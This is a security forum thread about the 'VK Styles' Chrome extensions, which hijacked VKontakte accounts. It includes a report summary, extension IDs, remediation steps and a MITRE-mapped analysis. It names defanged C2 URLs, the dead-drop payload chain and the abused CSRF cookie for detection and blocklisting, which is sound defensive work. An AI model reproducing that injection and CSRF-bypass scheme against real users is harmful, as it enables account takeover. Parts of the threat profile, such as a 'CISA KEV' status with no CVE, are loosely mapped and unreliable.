Malware News VK Styles: 500K Users Infected by Chrome Extensions That Hijack VKontakte Accounts

[Khushal]

Content source

https://www.koi.ai/blog/vk-styles-500k-users-infected-by-chrome-extensions-that-hijack-vkontakte-accounts

Half a million VKontakte users had their accounts silently hijacked. Their settings reset every 30 days. Automatically subscribed to groups they never chose. All through Chrome extensions that looked like simple VK customization tools.

This isn't just adware or a simple typosquat. This is active account manipulation - malware that:

• Automatically subscribes users to the attacker's VK groups (75% probability on each session)
• Resets account settings every 30 days to override user preferences
• Manipulates CSRF tokens to bypass VK's security protections
• Tracks donation status to gate features and monetize victims
• Maintains persistent control through multi-stage code injection

The attacker? A single threat actor operating under the GitHub username 2vk, using VK's own social network to distribute malicious payloads and build a follower base through forced subscriptions.

VK Styles: 500K Users Infected by Chrome Extensions That Hijack VKontakte Accounts

500,000+ VKontakte accounts were hijacked by fake VK Styles Chrome extensions that forced group subscriptions, reset settings monthly, and bypassed CSRF.

www.koi.ai

 

[Bot]

This report is worth taking seriously because it describes a browser-extension threat that goes beyond “ads/redirects” and directly drives actions inside the victim’s VK account via injected scripts.

What the KOI report is claiming (and what makes it notable)

• The extensions aren’t just modifying page appearance; they allegedly inject code into vk.com pages and then use VK-side tokens/cookies to perform actions as the logged-in user (forced group subscriptions, periodic settings changes). VK Styles: 500K Users Infected by Chrome Extensions That Hijack VKontakte Accounts
• Multi-stage delivery: the report describes using a VK profile page as a “dead drop” (payload URLs hidden in HTML meta tags), then pulling the next stage from a GitHub-controlled location. This helps the actor change behavior without shipping a brand-new extension build every time. VK Styles: 500K Users Infected by Chrome Extensions That Hijack VKontakte Accounts
• Scale: KOI states ~502,000 installs across 5 related extensions, and that the main one (“VK Styles”) was removed February 6, 2026. KOI also attributes activity to a GitHub user “2vk”. VK Styles: 500K Users Infected by Chrome Extensions That Hijack VKontakte Accounts

Extension IDs mentioned in the report (practical check)
If someone wants to quickly sanity-check whether they were exposed, have them open chrome://extensions, enable “Developer mode”, and compare IDs.

The KOI post lists these IDs, and Chrome-Stats also shows “VK Styles” was removed on 2026-02-06:

• ceibjdigmfbbgcpkkdpmjokkokklodmc (VK Styles – removed 2026-02-06) VK Styles - Custom Themes for vk.com
• mflibpdjoodmoppignjhciadahapkoch (VK Music - audio saver) VK Music - Audio Saver & Bitrate Info
• lgakkahjfibfgmacigibnhcgepajgfdb (Music Downloader - VKsaver) Music Downloader - VKsaver: Save VK Audio Easily
• bndkfmmbidllaiccmpnbdonijmicaafn (vksaver - music saver vk) VKsaver - Save VK Music & Video with Bitrate Display
• pcdgkgbadeggbnodegejccjffnoakcoh (VKfeed – removed 2024-10-03) VKfeed - Download Music and Video from VK

What to do if someone had one of these installed
Keep it boring and methodical (and assume Chrome Sync may reintroduce extensions/settings):

• Remove the extension(s) completely (and any other VK-related “downloader/theme” extensions you don’t absolutely need).
• In Chrome/Chromium: turn off Sync temporarily, then remove the extension(s), then review any other extensions with broad site access (“On all sites”).
• Clear VK site data (cookies/storage) after removal, then re-login.
• On VK: change password, enable 2FA if available, and revoke all active sessions/devices (log out everywhere). This matters because the extension’s power comes from running while you are authenticated.
• Audit VK account state: groups/pages you’re subscribed to, “connected apps”/authorized services (if present), and any profile/settings that keep reverting.
• Run a reputable on-demand scan (this threat is primarily in-browser, but scanning is still a reasonable hygiene step).

Why “removal from the Web Store” doesn’t fully solve it
Even when Google delists an extension, already-installed copies can remain on endpoints until the user/admin removes them. That’s why incident writeups like this often keep paying dividends for defenders: the real cleanup happens locally.

Sources

• VK Styles: 500K Users Infected by Chrome Extensions That Hijack VKontakte Accounts
• VK Styles - Custom Themes for vk.com
• VK Music - Audio Saver & Bitrate Info
• Music Downloader - VKsaver: Save VK Audio Easily
• VKsaver - Save VK Music & Video with Bitrate Display
• VKfeed - Download Music and Video from VK

 

[Halp2001]

The shrewdest enemy doesn’t break in by force, but disguised as ornament. Handing over access is like giving the fortress key away for a smile. The strategy: distrust beauty that demands power.

 

[Divergent]

Technical Analysis & Remediation

MITRE ATT&CK Mapping

T1189
Drive-by Compromise (via Web Store distribution).

T1059.007
Command and Scripting Interpreter: JavaScript.

T1539
Steal Web Session Cookie (Manipulation of CSRF tokens).

T1562.001
Impair Defenses: Disable or Modify Tools (Settings overrides).

CVE Profile
NVD Score: N/A (Feature Abuse) | CISA KEV

Status
Inactive.

Telemetry

Extension IDs
ceibjdigmfbbgcpkkdpmjokkokklodmc, mflibpdjoodmoppignjhciadahapkoch, lgakkahjfibfgmacigibnhcgepajgfdb, bndkfmmbidllaiccmpnbdonijmicaafn, pcdgkgbadeggbnodegejccjffnoakcoh.

File Size
Unknown (Not present in source telemetry).

String Literals
"'R-A-' + 843079 * 2" (Used to evade static string analysis), "vk.com/m0nda", "remixsec_redir".

C2 Architecture
The structure resembles a multi-stage dead-drop resolver. The extension fetches HTML metadata from hxxps://vk[.]com/m0nda, parses it for encoded payload locations (e.g., hxxps://2vk[.]github[.]io/-/), and executes the resulting GitHub-hosted payload in the user's browser.

Cookie Manipulation
The payload explicitly reads and manipulates the "remixsec_redir" cookie to bypass VK's Cross-Site Request Forgery (CSRF) protections, allowing unauthorized API calls.

Remediation - THE ENTERPRISE TRACK (NIST SP 800-61r3 / CSF 2.0)

Note
As Google Chrome and VKontakte are not default Windows OS components, the threat to baseline enterprise infrastructure is assessed as Theoretical/Low unless Chrome is actively deployed and users are permitted to install unapproved extensions.

GOVERN (GV) – Crisis Management & Oversight

Command
Update Acceptable Use Policies (AUP) to explicitly prohibit the installation of unauthorized browser extensions on corporate assets.

Command
Establish a software supply chain review board for browser extensions.

DETECT (DE) – Monitoring & Analysis

Command
Query EDR/RMM telemetry for the presence of the identified Extension IDs (e.g., ceibjdigmfbbgcpkkdpmjokkokklodmc) across the fleet.

Command
Monitor web proxy logs for anomalous traffic reaching hxxps://2vk[.]github[.]io or hxxps://an[.]yandex[.]ru/system/context.js originating from non-developer subnets.

RESPOND (RS) – Mitigation & Containment

Command
Push Group Policy Objects (GPO) or MDM profiles to forcibly remove the malicious Extension IDs and blocklist them via Chrome Enterprise policies.

Command
Isolate any endpoints showing active C2 beaconing to the GitHub dead-drop repository.

RECOVER (RC) – Restoration & Trust

Command
Invalidate and force-reset all active web session tokens (specifically targeting VKontakte if used for corporate communications).

IDENTIFY & PROTECT (ID/PR) – The Feedback Loop

Command
Implement Chrome Enterprise ExtensionAllowlist policies, moving from a default-allow to a default-deny posture for all browser extensions.

Remediation - THE HOME USER TRACK (Safety Focus)

Priority Constraint
Disconnection from the internet is NOT required as this is an application-layer (browser) threat, not a system-level worm or ransomware.

Priority 1: Safety

Command
Do not log into banking, email, or social media accounts on the affected browser until the extension is removed.

Command
Open Google Chrome, navigate to chrome://extensions/, and immediately "Remove" any extensions named "VK Styles" or matching the IDs listed in the telemetry above.

Priority 2: Identity

Command
Using a known clean device (or the cleaned browser), log into VKontakte.

Command
Navigate to VK settings, manually revert any forced configuration changes (e.g., feed sorting), and unsubscribe from unauthorized groups (specifically Group ID -168874636 / "VK Styles").

Command
Terminate all active web sessions within VKontakte security settings to invalidate the stolen "remixsec_redir" CSRF tokens.

Priority 3: Persistence

Command
Clear all browser cookies and cache (Time range: "All time") to ensure no residual malicious scripts or manipulated tokens remain.

Hardening & References

Baseline
CIS Benchmarks for Google Chrome (v130+).

Framework
NIST CSF 2.0 / SP 800-61r3.

Guidance
To mitigate runtime evaluation evasion (e.g., "'R-A-' + 843079 * 2"), prioritize behavioral endpoint monitoring over static string analysis. Enforce strict Content Security Policies (CSP) and Extension Manifest V3 compliance to limit an extension's ability to execute remotely hosted code.

Source

Koi.ai